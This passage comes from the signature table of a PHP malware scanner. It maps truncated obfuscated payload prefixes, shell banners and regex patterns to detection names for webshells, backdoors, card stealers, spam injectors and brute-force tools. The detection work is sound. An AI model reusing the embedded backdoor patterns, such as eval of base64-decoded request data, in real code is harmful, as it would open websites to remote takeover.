			'eval(gzinflate(base64_decode("7X37c9pI1ujPd6v2f2C8qc' => array(STR_CLEARFILE, 'php.backdoor.webshell.077.03', NULL),
			'eval(gzinflate(base64_decode("hVVtk5pIEP5sqvIfJpZ1A3uIaHT' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.091', 'eval.gzinflate.base64_decode..hVVtk5pIEP5sqvIfJpZ1A3[^)]+\)\)\);'), 
			'eval(gzinflate(base64_decode(\'pRhrc9M69nN3Zv' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.frmDs-injector.006', 'eval.gzinflate.base64_decode..pRhrc9M69nN3Zv[^)]+\)\)\);'),
			'eval(gzinflate(base64_decode(\'7L35dyTHdSb6c' => array(STR_CLEARFILE, 'php.backdoor.webshell.078', NULL),
			'eval(gzinflate(base64_decode(\'FJzHkqPatkU' => array(STR_CLEARFILE, 'php.backdoor.r57-shell.004', NULL),
			'eval(gzinflate(base64_decode(strrev(\'/0///973n3' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.003', NULL),
			'eval(gzinflate(base64_decode(\'FZfFDsVIDkX3' => array(STR_CLEARFILE, 'php.backdoor.webshell.079', NULL),
			'eval(gzinflate(base64_decode("JJ3HkqNaFkX' => array(STR_CLEARFILE, 'php.backdoor.WSO.003', NULL),
			'eval(gzinflate(base64_decode(\'bY7fCoIwHIXvB' => array(STR_CLEAR_LINEMATCH, 'php.hacktool.cms_credentials_stealer.007', 'eval.gzinflate.base64_decode..bY7fCoIwHIXvB[^)]+\)\)\);'),
			'eval(gzinflate(base64_decode(str_rot13(strrev(\'==jQAiL8PdIhRn6ElHerQmZgP' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.060', 'eval\(gzinflate\(base64_decode\(str_rot13\(strrev\(.==jQAiL8PdIhRn6ElHerQmZgP[^\)]+\)\)\)\)\)\;'),
			'eval(gzinflate(base64_decode(\'5b1rdxrHEij62Xut/R9aE3YGYoQA2Y6DBJItS7' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.065', 'eval\(gzinflate\(base64_decode\(.5b1rdxrHEij62X[^;]+\);'),
			'EcHoLL' => array(STR_CLEARFILE, 'php.backdoor.echoll.001', NULL),
			'eval(x0b($secure));' => array(STR_CLEARFILE, 'php.backdoor.filesman.060', NULL),
			'm=\"\"; for (i=0; i<s.length; i++) m+=String.fromCharCode' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.040.03', '(?<=echo ")<.php\s*eval.gzinflate.base64_decode\([^\)]+\)\)\);\s*<<<EOF\s*>\s*\<script[^>]+>\s*<!--\s*var [^-]+charCodeAt.i.-1\); document.write.m.;[^<]+<.script>\s*EOF;\s*\?>'),
			'jVRpc5s6FP3ODP9BbTMFT/IKOMYmiZc6jrcY70vi' => array(STR_CLEARFILE, 'php.backdoor.filesman.078', NULL),
			'eval(gzinflate(base64_decode(\'s7ezsS/IKODlSi1LzNFIy8xJj' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.019', 'eval\(gzinflate\(base64_decode\(\'s7ezsS\/IKODlSi1LzNFIy8xJj[^;]+?;'),
			'eval(gzinflate(base64_decode(\'DcxBCoAgEAXQveA50o3uK/IoIjLqgIySn+j49Q7wwnWG2aZW9KRuCneKlRDzEJBgma0Bc/' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.020', 'eval\(gzinflate\(base64_decode\(\'DcxBCoAgEAXQveA50o3uK\/IoIjLqgIySn\+j49Q7wwnWG2aZW9KRuCneKlRDzEJBgma0Bc\/[^;]+?;'),
			'eval(gzinflate(base64_decode(\'lZzNriQ7EYT3SLzDaHQXsLk6VXbaXbriT' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.021', '(?:preg_replace[^,]+\/e["\']\s*,\s*["\'])?eval\(gzinflate\(base64_decode\(\'lZzNriQ7EYT3SLzDaHQXsLk6VXbaXbriT[^;]+?;(?:\s*["\']\s*,\s*["\']\s*["\']\s*\)\s*;)?'),
			'eval(gzinflate(base64_decode(\'TVfHDsRIbv2XuaxtGV' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.022', '(?:preg_replace[^,]+\/e["\']\s*,\s*["\'])?eval\(gzinflate\(base64_decode\(\'TVfHDsRIbv2XuaxtGV[^;]+?;(?:\s*["\']\s*,\s*["\']\s*["\']\s*\)\s*;)?'),
			'eval(gzinflate(base64_decode(\'pRj9U+O68Wc60//BZFxs35nEc' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.082', 'eval\(gzinflate\(base64_decode\(\'pRj9U\+O68Wc60\/\/BZFxs35nEc[^;]+?;'),
			'eval(gzinflate(base64_decode(\'pRhrc6PI8bNTlf+AVcTALosQellrY3vrVrm7quyto9WmkrK9qhEM0kTAcAOS' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.083', 'eval\(gzinflate\(base64_decode\(\'pRhrc6PI8bNTlf\+AVcTALosQellrY3vrVrm7quyto9WmkrK9qhEM0kTAcAOS[^;]+?;'),
			'eval(gzinflate(base64_decode(\'Dc+3kqNIAADQz9mZ6kBAY2sjhBES3pvkCu+9EfD1t/lLXn7E3U9510PRxVv+k8RrTuL/ZX' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.hidden-links.004', 'eval\(gzinflate\(base64_decode\(\'Dc\+3kqNIAADQz9mZ6kBAY2sjhBES3pvkCu\+9EfD1t\/lLXn7E3U9510PRxVv\+k8RrTuL\/ZX[^;]+?;'),
			'eval(gzinflate(base64_decode(\'bVNhb9owEP1cfsXJQyJIJemqaVKBZO1ESqnKSgOlHVkUObEh3pw4ShwGqvjvcxJW0VJLUe' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.195', 'eval\(gzinflate\(base64_decode\(\'bVNhb9owEP1cfsXJQyJIJemqaVKBZO1ESqnKSgOlHVkUObEh3pw4ShwGqvjvcxJW0VJLUe[^;]+?;'),
			'eval(gzinflate(base64_decode(\'HVlFDsTIFb1KdpmRF2ZSYGRmu82wiczsNtPp08ne0q/69VD+69///Ot' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.196', 'eval\(gzinflate\(base64_decode\(\'HVlFDsTIFb1KdpmRF2ZSYGRmu82wiczsNtPp08ne0q\/69VD\+69\/\/\/Ot[^;]+?;'),
			'7T39X9pI8z8//Xz6P2xTvhc4kfCmrSKctmq1tdWK1uuLD5eQAGkDiUkAqef//p3Z3SSbEFDsy7X3FO5qkp2dmZ2dnZ2Z3' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.197', '\$(\w+)\s*=\s*\'7T39X9pI8z8\/\/Xz6P2xTvhc4kfCmrSKctmq1tdWK1uuLD5eQAGkDiUkAqef\/\/p3Z3SSbEFDsy7X3FO5qkp2dmZ2dnZ2Z3[^;]+?;\s*eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*\$\1\s*\)[^;]+?;'),
			'eval(gzinflate(base64_decode(\'FZlHEoPYFUW34pm7iwEiQzl0kXPOTFxkkXNcvdULECX+f+/ec6S//vvvv/5Rnmn' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.198', '<\?\ eval\(gzinflate\(base64_decode\(\'FZlHEoPYFUW34pm7iwEiQzl0kXPOTFxkkXNcvdULECX\+f\+\/ec6S\/\/vvvv\/5Rnmn[^;]+?;'),
			'eval(gzinflate(base64_decode(\'FZlFEoRYFkW3UrOuDgZoItFSgbs7kw4cEndZfWflBoD/37v3nMi//vvvv/4oz7T' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.199', 'eval\(gzinflate\(base64_decode\(\'FZlFEoRYFkW3UrOuDgZoItFSgbs7kw4cEndZfWflBoD\/37v3nMi\/\/vvvv\/4oz7T[^;]+?;'),
			'R3mm/Z/1+x2rPt3LP7N0Kwnsf0WZT0X557/+EJNV7iY33LtoBGYprGtJbdC2WHOW' => array(STR_CLEARFILE, 'php.backdoor.filesman.074', NULL),
			'3T1rd9s4rp/Tc/ofWG1mZN/63UynE8fuZPJoe7dNcvPo7E6S41UsOdbElrySnEfb' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell.104', 'eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["\']3T1rd9s4rp\/Tc\/ofWG1mZN\/63UynE8fuZPJoe7dNcvPo7E6S41UsOdbElrySnEfb[^;]+?;'),
			'1VVtT9swEP5cfoWpKpJI3XjrXkSBdYJOmsQ' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell.105', 'eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["\']1VVtT9swEP5cfoWpKpJI3XjrXkSBdYJOmsQ[^;]+?;'),
			'eval(gzinflate(base64_decode("7X37V9tI0ujP7DnzP3Q0/kb2xBjbkEwC2ITwSEgIMBjIi1xWlmVbQbY8kswjWf73W1X9lC' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.200', 'eval\(gzinflate\(base64_decode\("7X37V9tI0ujP7DnzP3Q0\/kb2xBjbkEwC2ITwSEgIMBjIi1xWlmVbQbY8kswjWf73W1X9lC[^;]+?;'),
			'eval(gzinflate(base64_decode(\'FZjXDoPYGYRfJXe7ERf0piS7ovdmOjcRYHrv5enjYCFZMkKcwz8z3/jvv/799z+' => array(STR_CLEARFILE, 'php.backdoor.uploader.201', NULL),
			'eval\(gzinflate\(base64_decode[^;]+?;\s*(?:eval\(\$[^;]+?;\s*){5,6}' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.uploader.202', 'eval\(gzinflate\(base64_decode[^;]+?;\s*(?:eval\(\$[^;]+?;\s*){5,}'),
			'eval(gzinflate(base64_decode(\'pVNdi9swEHw/uP+wEQbFkCZpy0G5x' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.203', 'eval\(gzinflate\(base64_decode\(\'pVNdi9swEHw\/uP\+wEQbFkCZpy0G5x[^;]+?;'),
			'eval(gzinflate(base64_decode(\'hVhrc+JGFv3srdr/4FRNBZx1JXqgYanEW8uCxpZx' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.205', 'eval\(gzinflate\(base64_decode\(\'hVhrc\+JGFv3srdr\/4FRNBZx1JXqgYanEW8uCxpZx[^;]+?;'),
			'eval(gzinflate(base64_decode(\'7L0HYBxJliUmL23Ke39K9UrX4HShCI' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.206', 'eval\(gzinflate\(base64_decode\(\'7L0HYBxJliUmL23Ke39K9UrX4HShCI[^;]+?;'),
			'eval(gzinflate(base64_decode(\'3X1rcyPJceBnKkL/oQcLbQO7IF4kZ4bEkDMcksPhLIfk' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.207', '\$pass[^;]+?;\s*eval\(gzinflate\(base64_decode\(\'3X1rcyPJceBnKkL[^;]+\);'),
			'eval(gzinflate(base64_decode(\'FJ3HcqTaEkU/53UEA3wBQ7z3nskLPIX' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell.113', 'eval\(gzinflate\(base64_decode\(\'FJ3HcqTaEkU\/53UEA3wBQ7z3nskLPIX[^;]+?;'),
			'eval(gzinflate(base64_decode(\'TZzXrvPsdp3PA+QejD8GnIRO2BsMH4hd7L1hAxvsReydvPrw8zYQHwhaFMkl8n3nHOMZEq' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.075', 'eval\(gzinflate\(base64_decode\(\'TZzXrvPsdp3PA\+QejD8GnIRO2BsMH4hd7L1hAxvsReydvPrw8zYQHwhaFMkl8n3nHOMZEq[^;]+?;'),
			'eval(gzinflate(base64_decode("HZzHkuNQdgV/ZXYzE1jAu5BCE/CW8JYbBbz3Hl8vlhbdm64iAbx3z8lkg/jP' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.076', 'eval\(gzinflate\(base64_decode\("HZzHkuNQdgV\/ZXYzE1jAu5BCE\/CW8JYbBbz3Hl8vlhbdm64iAbx3z8lkg\/jP[^;]+?;'),
			'eval(gzinflate(base64_decode(rawurldecode(\'5b1rWxs3EzD8GX6F2Pru2o0xtknSFGNCQiAhTSDlkKQJedy1vba3rL3u7' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.filesman.077', 'eval\(gzinflate\(base64_decode\(rawurldecode\(\'5b1rWxs3EzD8GX6F2Pru2o0xtknSFGNCQiAhTSDlkKQJedy1vba3rL3u7[^;]+?;'),
			'7X1te9s2suh3/QqY1QZiItGSnHSzkinbTZxN7uZtY2fbXttHpSRKYi2RKkn5pa7/+50ZACT4JsvZ7t7nPs/dnhOLwGAAD' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.088', NULL),
			'7X15f9rIsuj/+f3yHRSu7wATjBGLbezYE+/Ge/DuJI8rkADFAjES2CY5eZ/9VVV3S60F2d' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell.107', 'eval\(gzinflate\(base64_decode\(\'7X15f9rIsuj\/\+f3yHRSu7wATjBGLbezYE\+\/Ge\/DuJI8rkADFAjES2CY5eZ\/9VVV3S60F2d[^;]+?;'),
			'eval(gzinflate(base64_decode(\'7f1pe+M2sjAMf5/rmv/AVjxpO5a1Wd5jJ1pt2dYueevu10OJlERroUxS65z+728VFhJctL' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell.108', 'eval\(gzinflate\(base64_decode\(\'7f1pe\+M2sjAMf5\/rmv\/AVjxpO5a1Wd5jJ1pt2dYueevu10OJlERroUxS65z\+728VFhJctL[^;]+?;'),
			'eval(gzinflate(base64_decode(\'7f1pe+JIsjCAfp55nvkPKsbTtscusxhv5ba7xQ5mxxhDdV0fgYSQEQhL7HPq/vYbkZmSUg' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell.109', 'eval\(gzinflate\(base64_decode\(\'7f1pe\+JIsjCAfp55nvkPKsbTtscusxhv5ba7xQ5mxxhDdV0fgYSQEQhL7HPq\/vYbkZmSUg[^;]+?;'),
			'eval(gzinflate(base64_decode(\'FJ3HbuNQm23n/SL9AxwwJ6BxG8xBzJmcNJhzznz66wJqZFgu6pzz7b0WJVv/+//+53+XZv' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell.111', 'eval\(gzinflate\(base64_decode\(\'FJ3HbuNQm23n\/SL9AxwwJ6BxG8xBzJmcNJhzznz66wJqZFgu6pzz7b0WJVv\/\+\/\/\+53\+XZv[^;]+?;'),
			'SyvNSy7JzM9TCHaJKEkK1VApyk/KL9GshtC26VWZeWk5iSWpGkmJxalmJvEpqcn5KakaRY' => array(STR_CLEARFILE, 'php.backdoor.webshell.112', NULL),
			'7P37ehq58igM/73zPLkHhWENMLE5+RAfgicYsI3j' => array(STR_CLEARFILE, 'php.backdoor.webshell.110', NULL),
			';eval(gzinflate(base64_decode(rawurldecode(${$' => array(STR_CLEARFILE, 'php.backdoor.uploader.204', NULL),
			'jsNCj8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJ' => array(STR_CLEARFILE, 'php.backdoor.r57-shell.006', NULL),
			'7b17f9vG0TD6d/v75TusEaYmE5KiZOcmWXJkSY59alt+JLlpXtmHBQlQQkUSDABKdl' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.004', NULL),
			'echo \'wo cao hao niu bi\';' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.087', NULL),
			'ibl13Z Private Shell' => array(STR_CLEARFILE, 'php.backdoor.webshell.106', NULL),
			'Priv8 Wordpress Mass brute Force' => array(STR_CLEARFILE, 'php.hacktool.wordpress_bruteforce.005', NULL),
			'eval(gzinflate(base64_decode(rawurldecode($_' => array(STR_CLEARFILE, 'php.backdoor.generic.045.07', NULL),
			'eval(gzinflate(base64_decode(\'y8xLzilNSY3Pz0tOVVDXz8' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.036', 'eval\(gzinflate\(base64_decode\([\'"]y8xLzilNSY3Pz0tOVVDXz8jP[^\)]+\)\)\);'),
			'eval("?>".gzinflate(base64_decode("' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.010', NULL),
			'eval(gzinflate(base64_decode("DZW1rsUIskX/ZaJuOTDD0dMEZmZ' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.passthru.007', 'eval\(gzinflate\(base64_decode\(.DZW1rsUIskX[^;]+\)\)\);'),
			'eval(gzinflate(base64_decode("DZZHDqwIEkTv0qv/xQIovEa9wHtXeDYtvPee009dIJX' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.094', 'eval\(gzinflate\(base64_decode\(.DZZHDqw[^;]+\)\)\);'),
			'eval(gzinflate(base64_decode(\'U8n3z7dNr8rMS8t' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.076', '\$\w+\s*=\s*__FILE__\s*;\s*\$\w+\s*=[^;]+;\s*eval\s*\(gzinflate\(base64_decode\(.U8n3z7dNr8rMS8t[^\)]+\)\)\)\s*;'),
			'@eval(gzinflate(base64_decode(\'FJ23ctzYFkV/ZYKpmgABvAteAO9do2Eze' => array(STR_CLEARFILE, 'php.malware.dropper.026', NULL),
			'FkEOJA5jzx4HLNxCJq0s3quUHQwXN3B0sVgU' => array(STR_CLEARFILE, 'php.backdoor.filesman.091', NULL),
			'if (empty($access_key) || (isset($_REQUEST[\'key\']) && $_REQUEST[\'key\'] == $access_key)) {' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.007', NULL),
			'\*\/\s*\?>\s*<\?php\seval\(gzinflate\(base64_decode\([^\)]+\)\)\)\s*;' => array(REX_CLEAR_MULTIMATCH, 'php.malware.base64.033', '(?<=\*\/\s\?>\s<\?php\s)eval\(gzinflate\(base64_decode\([^\)]+\)\)\)\s*;'),
			'<?php eval(gzinflate(gzinflate(base64_decode(' => array(STR_CLEAR_LINEMATCH, 'php.malware.base64.036', '(?<=<\?php\s)eval\(gzinflate\(gzinflate\(base64_decode\(["\'][^\)]+\)\)\)\)\s*;(?=\s\?>)'),
			'7X39d9q6sujPuWvd/0H14W7DLiFA0r3bEJLmO7RpkoZ89CN9OcYYcDGYbZuQtCf/+5sZfVg2htB2n3PXW+vts06DpdFoNJ' => array(STR_CLEARFILE, 'php.backdoor.WSO.010', NULL),
			'sE8Ot7r9UPvQct5BIMT/uS0Wc2dF8WHKFsnIACTyDKI6dKbN1e3uH2q+bBmzfwFvn9sHHwtmDHk0FqBuIJ8mu44x69O/kv' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.096', NULL),
			'HZbFrsUIrkU/p6uUQZj0RmFmPJm0wsycr39XPbdkydtey' => array(STR_CLEARFILE, 'php.spam-seo.injector.284', NULL),
			'7X1bcxw3luaz9SvSZbaLHPEuyXbzZpdI2patm0XKbltiM7I' => array(STR_CLEARFILE, 'php.backdoor.webshell.171', NULL),
			'FZM1EqUKAgDv8qP5RYA/oDbC3Z1kC3d3Tr+zF' => array(STR_CLEARFILE, 'php.backdoor.eval_file_get_contents.007', NULL),
			'jVRtb9s4DP4eIP+BEYqzAzR2OuzDYU3Sa4ukHbZlRZIe7lAMhiIzthDZ' => array(STR_CLEARFILE, 'php.backdoor.uploader.309', NULL),
			'7f1rd9tIkiiKfvda/g8wRl0gqyiKT0mUTJXesmS9rJdl2d4ckARJWCTBAkhJ' => array(STR_CLEARFILE, 'php.backdoor.r57-shell.007', NULL),
			'DVY1EuTYEjzOzoQMYQvixxpibjE6G2Jm1ul/O896RmUlVBZn0v+p3mYs+2Qv' => array(STR_CLEARFILE, 'php.spam-seo.injector.319', NULL),
			'a0vGLOOW4GzDlnPv3QAwOGYchSq7uqvnMuSLo4k' => array(STR_CLEARFILE, 'php.backdoor.create_function.029', NULL),
			'ZxHj4NKFoV/zrwnFmQwmhU5R5M3I3LOmV8/7oWlt' => array(STR_CLEARFILE, 'php.hacktool.mailer_gen.005', NULL),
			'rRlrc5tI8q8QhzVoFyHQGzvYSSXKozZxfLZ8e1U' => array(STR_CLEARFILE, 'php.spam-seo.injector.326', NULL),
			'FZvHkoPKskU/554TDPAuXtwBAuG9h8kNPAjvzdc' => array(STR_CLEARFILE, 'php.hacktool.mailer.151', NULL),
			'DVa1EuwIDPuce29ShGmu2jAzbnMTZuZ8/W3nzrY' => array(STR_CLEARFILE, 'php.malware.curl.033', NULL),
			'HZu3csNYtkU/Z7oLAUh41IvgvfdIpuC99' => array(STR_CLEARFILE, 'php.hacktool.mailer.156', NULL),
			'7b15f+M4jgD69+zvt99B5cl0kkk' => array(STR_CLEARFILE, 'php.hacktool.generic.029', NULL),
			'$code_inject = \'<?php eval' => array(STR_CLEARFILE, 'php.malware.injector.013', NULL),
			'FZZFssUIkgSP01WmhZisbRZi6YkZNmNiZtbp58' => array(STR_CLEARFILE, 'php.spam-seo.injector.332', NULL),
			'7b1pWxu50jD8ebgu/oPSwz1tT4zxwk5MwmKICVtslkDI8bTdjd3Bdvu4bZbM5L+' => array(STR_CLEARFILE, 'php.backdoor.webshell.240', NULL),
			'FZZHDqTYEkWX01VigCdBf4T3kHgzaeG9' => array(STR_CLEARFILE, 'php.backdoor.curl.032', NULL),
		),

		'eval(base64_decode' => array(STR_TRIGGER,

			'file(__FILE__);eval(base64_decode(' => array(STR_TRIGGER,
				'<?php $Pass' => array(STR_CLEARFILE, 'php.malware.obfuscated.052', NULL),
				'oxMHfzRc7wvRuelc1SKDM1LjnZTLGYBdtUSojN9opJzEG44lre7VRPXxCCe2bbTVU' => array(STR_CLEARFILE, 'php.malware.obfuscated.059', NULL),
			),

			'.chr(' => array(STR_TRIGGER,
				'CURLOPT_COOKIEJAR,$GLOBALS[base64_decode(chr(' => array(STR_TRIGGER,
					'if(isset($_REQUEST[base64_decode(chr(' => array(STR_CLEARFILE, 'php.backdoor.uploader.289', NULL),
				),
			),

			'array(\'!\', \'@\', \'#' => array(STR_TRIGGER,
				'$newtext = str_replace($arr2,$arr1,$text);' => array(STR_CLEARFILE, 'php.backdoor.filesman.090', NULL),
			),

			'foreach($_POST' => array(STR_TRIGGER,
				'<\?(php)?[\s]*foreach\(\$_POST as \$[\w]+[\s]*=>[\s]*\$[\w]+\)[\s]*\{[\s]*eval[\s]*\([\s]*base64_decode[\s]*\([\s]*\$[\w]+\)\);?[\s]*\}[\s]*(exit[^\n]+)?' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.128', '<\?(php)?[\s]*foreach\(\$_POST as \$[\w]+[\s]*=>[\s]*\$[\w]+\)[\s]*\{[\s]*eval[\s]*\([\s]*base64_decode[\s]*\([\s]*\$[\w]+\)\);?[\s]*\}[\s]*(exit[^\n]+)?'),
			),

			'$auth = 1;' => array(STR_TRIGGER,
				'eval(base64_decode(\'aWYoJGF1dGggPT0gMSkgewppZiAoIWlzc2V0KCRfU0VSVkVSWydQSFBfQVVUSF9VU0VSJ1' => array(STR_CLEARFILE, 'php.backdoor.filesman.128', NULL),
			),

			'JEFQUF9Db2Rlcz0kR0xPQkFM' => array(STR_TRIGGER,
				'KGlzc2V0KCRfRU5WW3BhY2soJEdMT0JBTFNb' => array(STR_CLEARFILE, 'php.backdoor.curl.024', NULL),
			),

			'@chop(base64_decode(' => array(STR_TRIGGER,
				',__FILE__);' => array(STR_CLEARFILE, 'php.backdoor.eval_file_get_contents.008', NULL),
			),
			
			'viaWorm' => array(STR_TRIGGER,
				'class viaWorm' => array(STR_CLEARFILE, 'php.spam-seo.viaWorm.002', NULL),
			),

			'eval(base64_decode(\'ZnVuY3Rpb2' => array(STR_TRIGGER,
				'ZXZhbChldmFsKGV2YWwoZXZhbChldmFsKGV2YWwoZXZ' => array(STR_CLEARFILE, 'php.backdoor.filesman.144', NULL),
			),

			'QHByZWdfcmVwbGFjZSgiL1twYWdlZ' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.032', 'eval\(base64_decode\(.QHByZWdfcm[^)]+1ZSk7.\)\);'),
			'aGVhZGVyKCJMb2NhdGlvbjo' => array(STR_CLEAR_LINEMATCH, 'php.malware.redirect.012', 'eval\(base64_decode\([^;]+aGVhZGVyKCJMb2NhdGlvbjo[^;]+\);'),
			'} else {echo base64_decode(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.042', '\$(\w+)\s*=\s*\$_GET\[.\1.\]\s*;\s*if\s*\(\s*isset\s*\(\s*\$\1\s*\)\s*\)\s*{\s*eval\(\s*base64_decode\([^\)]+\)\s*\)\s*;\s*}\s*else\s*{\s*echo\s*base64_decode\([^\)]+\)\s*;\s*}'),
			'])){@eval(base64_decode($_SERVER[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_server_variable.001', '(?<=\?php\s)if\s*\(\s*\@\s*isset\s*\(\s*\$_SERVER\[\w+\]\s*\)\s*\)\s*{\s*\@\s*eval\(\s*base64_decode\(\s*\$_SERVER\[\w+\]\s*\)\s*\)\s*;\s*}\s*exit\s*;'),
			'ZWNobyBmaWxlX2dldF9jb250ZW50cygiaHR0c' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.file_get_contents.029', '\@?eval\(base64_decode\(.ZWNobyBmaWxlX2dldF9jb250ZW50cygiaHR0c[^\)]+\)(?:\.["\']\s*;\s*[\'"])?\s*\)\s*;'),
			'panel & FTP Checker' => array(STR_CLEARFILE, 'php.hacktool.ftp_cracker.001.02', NULL),
			'panel & FTP Cracker' => array(STR_CLEARFILE, 'php.hacktool.ftp_cracker.001', NULL),
			'eval(base64_decode($scanconfig));' => array(STR_CLEARFILE, 'php.hacktool.directory_scanner.001', NULL),
			'(?<=<\?php\s)(\$\w+)\s*=\s*[\'"]\w+Pz4NCg==[^;]+;\s*eval\(base64_decode\(\1\)\)\s*;(?=\s*\?>)' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.shell_dropper.004', '(?<=<\?php\s)(\$\w+)\s*=\s*[\'"]\w+Pz4NCg==[^;]+;\s*eval\(base64_decode\(\1\)\)\s*;(?=\s*\?>)'),
			'eval(base64_decode("JGFyclswXT0iQ2lSaGRYUm9JRDBnSW' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.085', NULL),
			'YjM3NG' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.012', NULL),
			'WebShellOrb' => array(STR_CLEARFILE, 'php.backdoor.webshell.150', NULL),
			'cmR3cmFwKCRzdHIpIHsNCiAgICAkc3RyID0gQH' => array(STR_CLEARFILE, 'php.backdoor.webshell.153', NULL),
			'@eval(base64_decode("LyoqDQogKiBTaWduYXR1cmUgRm9yIFJlcG9ydA0KICovJHgxMD0n' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_gen.019', '@eval\(base64_decode\(.Lyoq[^;]+\);'),
			'ZWdfbWF0Y2goJyNMb2NhdGlvblw6IChbXFNdKy' => array(STR_CLEARFILE, 'php.spam-seo.redirect.104', NULL),
			'NXlXREpPZGxwSFZYQlBlVUZMSnlrcE93b0siKSk7IA==' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.283', 'eval\(base64_decode\([^;]+MSnlrcE93b0siKSk7IA==.\)\);'),
			'eval(base64_decode("LyoqDQogKiBTaWduYXR1cmUgRm9yIFJlcG9ydA' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.099', '@?eval\(base64_decode\(.LyoqDQogKi[^;]+\);'),
			'P29wdGlvbiZwYXRoPSRwYXRoJm9wdD1jaG1vZCZ0eXBlPWRpciZuYW' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.webshell.161', 'eval\(base64_decode\(.Ly8NCi8vTWlDa2VZIEhlWHggQmF[^\)]+NCn0NCj8\+.\)\)'),
			'IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojI1NjcmlwdCBSZXNldHBhc3MgQ3B' => array(STR_CLEARFILE, 'php.hacktool.cpanel_reset_password.002', NULL),
			'JGRlZmF1bHRfYWN0aW9uID0gJ0ZpbGVzTWFuJzsKJGRlZmF1bHRfdXNlX2FqYXggPSB0cnVlOw' => array(STR_CLEARFILE, 'php.backdoor.filesman.110', NULL),
			'GvRubpXzq9vrRKGAUY8pxfP3ZYV/HJrOxLCjzy5hLPpoGxrla' => array(STR_CLEARFILE, 'php.malware.obfuscated.029', NULL),
			'ijrzxTfYDqdC1SuqhfYZjJtYS1Pz1R1AVySuFrAU+mZE3KVqt' => array(STR_CLEARFILE, 'php.malware.obfuscated.029.02', NULL),
			'payleets' => array(STR_CLEARFILE, 'php.backdoor.filesman.101.04', NULL),
			'HJ1X0qNGFIXfZxcIkUQSIJGjyDnn0Ox/Fe7f5fKDa8yo6b73nO8QmnJ3Zk23' => array(STR_CLEARFILE, 'php.backdoor.filesman.115', NULL),
			'XOeZobPmMZk9qPkvKxHwPA+uz5LbSMHlsoRPvOIL/ZsLl/hxInbGQTfnB0uB7A8=' => array(STR_CLEARFILE, 'php.backdoor.uploader.307', NULL),
			')));eval(returnmal(getmal($_' => array(STR_CLEARFILE, 'php.backdoor.webshell.190', NULL),
			'file(__FILE__);eval(base64_decode(getmal(' => array(STR_CLEARFILE, 'php.malware.obfuscated.032', NULL),
			'WC1NYWlsZXI6IFRoZSBCYXQ' => array(STR_CLEARFILE, 'php.mailer.POST.043', NULL),
			'VFRfU3ViamVjdCA9IHN0cmlwc2xhc2hlcyhiYXNlNjRfZGVjb2Rl' => array(STR_CLEARFILE, 'php.mailer.POST.044', NULL),
			'U2hlbGwgQmFja2Rvb3I' => array(STR_CLEARFILE, 'php.backdoor.webshell.188', NULL),
			'SKeJRoo7pZFlVRVltgMoNprFoZX6WBbEyOXsWD' => array(STR_CLEARFILE, 'php.backdoor.WSO.015', NULL),
